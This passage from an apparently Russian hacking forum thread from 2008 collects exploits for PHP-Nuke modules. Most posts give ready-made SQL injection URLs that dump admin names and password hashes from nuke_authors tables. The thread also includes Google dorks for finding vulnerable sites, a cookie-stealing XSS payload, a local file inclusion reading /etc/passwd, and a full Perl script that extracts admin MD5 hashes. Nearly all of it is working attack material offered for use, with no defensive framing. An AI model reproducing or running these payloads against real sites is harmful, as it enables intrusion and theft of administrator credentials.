    print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
    print "\n\r+========================================+\n";
    exit;
    }
    
    ?>
    
    # milw0rm.com [2008-01-22]
     
  6. FraiDex

    FraiDex Elder

    PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability

    example

    Code:
    http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}

    EXPLOIT 1:

    Code:
    -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201

    EXPLOIT 2:


    Code:
    -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
    (c)milw0rm.com
     
  7. Solide Snake

    Solide Snake Banned

    PHP-Nuke Module Sections (artid) Remote SQL Injection

    SQL Injection

    Code:
    Example:
    
    www.xxX/xxxxSections&op=viewarticle&artid=(exploit)
    
    Code:
    
    9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
    To find sites with this module:

    Code:
    allinurl: "имя секции"
    (c)
     
  8. Solide Snake

    Solide Snake Banned

    PHP-NUKE Modules Okul v1.0 Remote SQL Injection

    SQL Injection

    Code:
    modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

    PHP-Nuke Module Inhalt (cid) SQL Injection

    SQL Injection

    Code:
    modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
    
    
    modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
    (c) biyofrm.com
     
  9. Solide Snake

    Solide Snake Banned

    PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection

    SQL Injection

    Code:
    modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

    PHP-Nuke Module Siir (id) Remote SQL Injection

    SQL Injection

    Code:
    modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
    To search:

    Code:
    allinurl: modules-php-name-Siir
    (c) s@bun
     
  10. iddqd

    iddqd Banned

    PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

    PoC:
    Code:
    /modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
    
     
  11. FraiDex

    FraiDex Elder

    PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability

    Exploit 1:
    Code:
    modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
    
    Exploit 2:
    Code:
    modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
    
    
    (c) milw0rm.com
     
    #11 FraiDex, 25 Feb 2008
    Last edited: 25 Feb 2008
  12. iddqd

    iddqd Banned

    Php Nuke "Sell" module SQL Injection ("cid")

    SQL Injection

    Exploit:

    Code:
    modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
    
     
  13. iddqd

    iddqd Banned

    PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability

    SQL Injection

    Exploit:

    Code:
    modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
    
     
  14. gibson

    gibson Elder

    Passive XSS

    XSS
    Go to http://rus-phpnuke.com/ and enter the following in the search field:
    "><iframe src="javascript:alert(document.cookie);" <
    and the cookies are displayed.
    The XSS found by ettee in the first post will not work there, because GET parameters are strictly filtered, or it works only with encoding.

    Sql inj modules 4nAlbum
    File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198
    example:
    http://site.name/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=[exploit]
    Injection:
    -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/*

    PS: the exploits will fail if they are not encoded correctly. ^__^
    {c}gibson
     
  15. iddqd

    iddqd Banned

    PHP-Nuke Copyright 2005 SQL

    Exploit:
    Code:
    -1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 
    
    modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1
    
    Google dork:
    Code:
    allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi" 
    allinurl:"gaestebuch_v22&func"
    
     
    #15 iddqd, 2 Mar 2008
    Last edited: 6 Mar 2008
  16. iddqd

    iddqd Banned

    PHP-Nuke Module eGallery "pid" Remote SQL Injection


    PoC:
    Code:
    modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
    
    PHP-Nuke Module "seminar" Local File Inclusion

    PoC:
    Code:
    modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../../etc/passwd
    
    Google dork:
    Code:
    inurl:"modules.php?name=seminar"
    
    Regards,
    The-0utl4w
     
    #16 iddqd, 6 Mar 2008
    Last edited: 6 Mar 2008
  17. iddqd

    iddqd Banned

    PHP-Nuke KutubiSitte "kid" SQL Injection

    PHP-Nuke KutubiSitte "kid" SQL Injection

    Exploit:
    Code:
    #!/usr/bin/perl 
    use Getopt::Std;
    use LWP::UserAgent;
    
    sub usg{
    printf("
    
    
       -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
       |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
       -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
      #######################################################
      # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
      #######################################################
    <-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
    #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
    #:-------------------------------------------------------:#
    :#|                    USAGE:                           |#:
    :#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
    #:-------------------------------------------------------:#
    #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
    #:-------------------------------------------------------:#
    :#|                   EXAMPLE:                          |#:
    :#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
    #:-------------------------------------------------------:#
    #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
    
    
    ");
    }
    sub problem{
        print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
        exit();
    }
    sub exploitation{
        
        $conn = LWP::UserAgent -> new;
        $conn->agent('Checkbot/0.4 ');
        $query_pwd =
    $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
        $return_pwd = $conn->get($query_pwd) || problem();
        $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
        print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
       }
    
    getopts(":h:p:U:",\%args);
         $host = $args{h} if (defined $args{h});
         $path = $args{p} if (defined $args{p});
         $user_id= $args{U}if (defined $args{U});
         
         if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
            usg();
         }
         else{
            exploitation();
         }
    Bug found by Lovebug
    Exploit coded by r080cy90r from RBT-4
     
  18. iddqd

    iddqd Banned

    PHP-Nuke SQL injection Module "Hadith" [cat]

    SQL Injection

    Exploit:
    Code:
    modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
    
    modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 
    
    Found by Lovebug [rbt-4]
     
  19. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke Module NukeC30 sql injection

    SQL Injection

    Vulnerable: Version 3.0

    Exploit:
    Code:
    http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2
    
    Found by HouSSaMix from H-T Team
     
  20. iddqd

    iddqd Banned

    PHP-Nuke Module ZClassifieds [cat] SQL Injection

    SQL Injection

    Vulnerable: Module ZClassifieds

    Exploit:

    Code:
    modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**
    
    ...thx Lovebug...